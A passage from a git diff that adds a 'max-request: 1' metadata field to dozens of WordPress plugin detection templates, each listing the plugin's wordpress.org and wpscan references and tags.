43cb2ab09c..c8acf8c625 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: + max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 7ba81036cf..66b7d6a363 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: + max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index 24fc3e3295..a36016562d 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: + max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 3e89505574..8033aacbc6 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/jetpack-boost/ metadata: + max-request: 1 plugin_namespace: jetpack-boost wpscan: https://wpscan.com/plugin/jetpack-boost tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e701e365ba..e4017b1a0a 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: + max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index c0cc5400a8..53d6d393bd 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: + max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 22687bcffe..c286e9a14f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: + max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index b69d3d5bfe..364e3cd71e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: + max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 7975a57702..4fcccbfc33 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index ff4cef94d7..3fbc714d3b 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index a8903697b0..c49b506979 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: + max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 3f141c4476..dfcaf6f71b 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: + max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 5355e988a2..61be246fee 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: + max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 6f06b49011..1c16a72d76 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: + max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 53d409fb68..50d2e6630b 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 0e908a9580..8d71f7bde9 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index aeb1875c57..5e1f97086e 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: + max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 7c15702305..d87d456a8c 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: + max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 5ce87e6c71..aa9153241e 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: + max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index c342e6b45a..09641796a3 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: + max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index e95041f555..28b70d09bf 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: + max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 879a0d1c12..b43c10ed7a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: + max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 985f5d373a..eb7e78bc7f 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: + max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index bbc305b8de..3da2ea50e1 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: + max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7e3e4e2d7e..7a58c58f63 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: + max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 17ea142c46..5f99b8cac8 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: + max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 953e4ab3d8..b08876df04 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: + max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 92107fa69c..3f68dffe06 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: + max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5e1fe4ef5c..34f9bde1d6 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: + max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 74fb3e6010..d9f645328f 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: + max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index b9f70ba555..8a1196fc9f 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: + max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 6486c02c9a..05025452b7 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: + max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 81f58198d3..1db1b57708 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: + max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 3743307dbc..dafe6974f6 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: + max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index a4c6980041..ba05fb1e16 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: + max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index e085f30e5a..a038adac53 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pinterest-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: pinterest-for-woocommerce wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index adf3387ddb..7f98d822a8 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: + max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index eb6e1aaa5d..89602f4264 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: + max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index b3c83cd0bf..2f6513ca42 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: + max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 96d8bd6aca..982306b13c 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: + max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 85955ac95e..fdcac13b56 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: + max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index a81fc892ca..fc316f9f7a 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: + max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index d9c6052cd7..975b63f5de 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: + max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index afc1141e0c..5065659e82 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: + max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index d44add9ca6..732ffbc4eb 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: + max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 20ba5c2e16..12dffeb534 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: + max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index cbcf3cf09d..ae0e76c4bb 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: + max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 3311d42c94..b1718d1ccb 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: + max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 46c1c22805..7543ac1d55 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 7c13b8d2a4..4a29cecdb0 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: + max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 53b30ba721..be281d91e6 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: + max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 9555d7aebd..6bd95ec077 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: + max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 180266f448..1fd64a5279 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: + max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 17584cd064..1bb9a283ce 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: + max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 015fb97043..7836d9554c 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: + max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 1d5224b457..ccd72e427a 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: + max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index aafd6c6a38..3622b2c6b3 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: + max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e10ab985da..9eff765d61 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: + max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 9881b591ae..c856e1fa9e 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml 